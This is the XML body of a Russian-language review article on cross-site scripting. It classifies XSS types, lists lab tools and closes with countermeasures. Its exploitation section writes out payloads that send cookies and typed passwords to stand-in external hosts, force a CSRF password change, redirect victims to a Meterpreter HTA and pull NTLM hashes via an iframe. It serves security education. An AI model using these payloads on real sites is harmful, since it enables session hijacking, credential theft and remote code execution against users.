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b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Межсайтовое выполнение сценариев (XSS): классификация,</w:t>
        <w:br/>
        <w:t>векторы эксплуатации и меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Аналитический обзор техники атаки на веб-приложения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Аннотация. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>В работе рассматривается уязвимость межсайтового выполнения сценариев (Cross-Site Scripting, XSS) — атака внедрения клиентского кода, при которой вредоносные сценарии исполняются в браузере пользователя доверенного сайта. Приведена классификация XSS (отражённая, хранимая, основанная на DOM, а также «слепая»), систематизированы векторы эксплуатации — от хищения сессионных идентификаторов и учётных данных до цепочек с CSRF, SQL-инъекцией и удалённым выполнением кода. Проанализировано воздействие и предложен комплекс мер противодействия.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевые слова: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>информационная безопасность; веб-уязвимости; XSS; межсайтовое выполнение сценариев; перехват сессии; CSRF; CWE-79.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>1. Введение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Межсайтовое выполнение сценариев представляет собой атаку внедрения кода на стороне клиента, при которой вредоносный JavaScript помещается в доверенные веб-страницы и впоследствии исполняется в браузерах их посетителей без их ведома. Несмотря на распространённое восприятие XSS как «безобидных всплывающих окон», настоящая работа демонстрирует, что реальное воздействие уязвимости простирается вплоть до полной компрометации системы. Целью исследования является систематизация типов XSS, векторов их эксплуатации и эффективных мер защиты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Классификация XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выделяют три основных типа уязвимости. Хранимая (stored) XSS предполагает постоянное размещение вредоносного сценария в базе данных приложения. Отражённая (reflected) XSS возвращает полезную нагрузку через параметры URL или поля форм. XSS на основе DOM (DOM-based) обусловлена небезопасной обработкой данных клиентским JavaScript. Отдельно рассматривается «слепая» (blind) XSS, при которой атакующему неизвестны место и время исполнения нагрузки: она сохраняется в приложении и срабатывает позднее — например, в административной панели.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Методология и инструментарий</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Для демонстрации используются уязвимые учебные приложения bWAPP (bee-box), DVWA и лаборатории PortSwigger Web Security Academy. Применяемый инструментарий включает Burp Suite (перехват запросов и механизм Collaborator), Responder (перехват NTLM-хешей), John the Ripper (восстановление паролей), Netcat (приём обратных соединений) и Metasploit Framework (генерация полезных нагрузок).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Базовые полезные нагрузки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Простейшие векторы подтверждают факт исполнения произвольного сценария:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"&gt;&lt;img src=x onerror=prompt(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Векторы эксплуатации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.1. XSS через загрузку файлов. Полезная нагрузка внедряется в имя загружаемого файла; при отражении имени в HTML встроенный сценарий исполняется автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.2. Хищение сессии (out-of-band). При «слепой» XSS значение cookie эксфильтруется на внешний домен (например, Burp Collaborator), после чего перехваченный идентификатор сессии подставляется в запросы атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fetch('https://burp-collaborator-domain.net', {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  method: 'POST', mode: 'no-cors', body: document.cookie });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.3. Перехват учётных данных. Внедрённая поддельная форма отправляет введённые логин и пароль на внешний домен при взаимодействии пользователя:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;input name=username id=username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;input type=password name=password onchange=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  "fetch('https://burp-domain.net',{method:'POST',mode:'no-cors',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   body:username.value+':'+this.value});"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.4. Связка с CSRF. Внедрение изображения с подготовленным URL вынуждает аутентифицированного пользователя незаметно сменить пароль при отсутствии CSRF-токена:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;img src="http://target/csrf_1.php?password_new=ignite&amp;password_conf=ignite&amp;action=change"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.5. Перенаправление и доставка нагрузки. Сценарий перенаправления используется для доставки, например, HTA-файла, сгенерированного через модуль Metasploit hta_server, с последующим получением сессии Meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;script&gt;window.location='http://attacker-ip:8080/payload.hta'&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.6. Перехват NTLM-хешей. Внедрение iframe инициирует запрос к ресурсу атакующего; перехваченные службой Responder хеши восстанавливаются John the Ripper:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;iframe src=http://attacker-ip/scriptlet.html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.7. Обратная оболочка. Через XSS публикуется ссылка на загруженный обратный PHP-шелл; его запуск авторизованным пользователем позволяет обойти ограничения по белому списку IP и получить доступ к оболочке на приёмнике Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.8. Связка с SQL-инъекцией. JavaScript-нагрузка кодируется в шестнадцатеричном виде и подставляется в UNION-запрос, в результате чего содержимое базы данных выводится через всплывающие окна.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Обсуждение результатов и воздействие</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Анализ показывает, что XSS служит точкой входа для широкого спектра атак: кражи сессий и учётных данных, перехвата аутентификации, удалённого выполнения кода, раскрытия базы данных и полного захвата учётной записи. Ключевой фактор риска — исполнение в контексте доверенного происхождения (origin), что придаёт действиям атакующего легитимность с точки зрения приложения и позволяет обходить ряд ограничений периметра.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7. Меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Для предотвращения XSS рекомендуется: выполнять контекстно-зависимое экранирование вывода (HTML, атрибуты, JavaScript, URL); проводить строгую валидацию ввода по белому списку; применять политику безопасности содержимого (Content Security Policy); устанавливать флаги HttpOnly и Secure для сессионных cookie; использовать CSRF-токены для операций, изменяющих состояние; а также задействовать проверенные библиотеки шаблонизации с автоматическим экранированием. Эшелонированная защита снижает как вероятность внедрения, так и последствия успешной эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>8. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В работе систематизированы типы уязвимости межсайтового выполнения сценариев и векторы её эксплуатации — от базового исполнения сценария до сложных цепочек с CSRF, SQL-инъекцией и удалённым выполнением кода. Показано, что воздействие XSS выходит далеко за рамки демонстрационных всплывающих окон и способно приводить к полной компрометации системы. Надёжная защита достигается сочетанием контекстного экранирования, валидации по белому списку и политики безопасности содержимого.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Список источников</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. OWASP Foundation. Cross Site Scripting (XSS). OWASP Community Pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. OWASP Foundation. Testing for Cross Site Scripting. OWASP Web Security Testing Guide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. MITRE. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. OWASP Foundation. XSS (Cross Site Scripting) Prevention Cheat Sheet; Content Security Policy Cheat Sheet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. PortSwigger. Web Security Academy: Cross-site scripting. PortSwigger Ltd.</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567"/>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